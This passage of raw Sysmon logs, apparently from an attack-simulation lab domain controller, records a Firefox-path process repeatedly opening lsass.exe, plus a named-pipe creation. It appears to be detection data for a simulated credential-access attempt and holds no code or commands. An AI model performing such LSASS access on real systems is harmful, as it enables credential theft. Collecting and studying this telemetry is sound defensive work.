Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.343{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.342{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.342{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.342{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.342{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.342{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.340{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.340{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.340{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.340{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.339{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.339{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.339{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.339{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.339{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.338{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.338{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000048026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.320{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.3.178174835C:\Program Files\Mozilla Firefox\firefox.exe 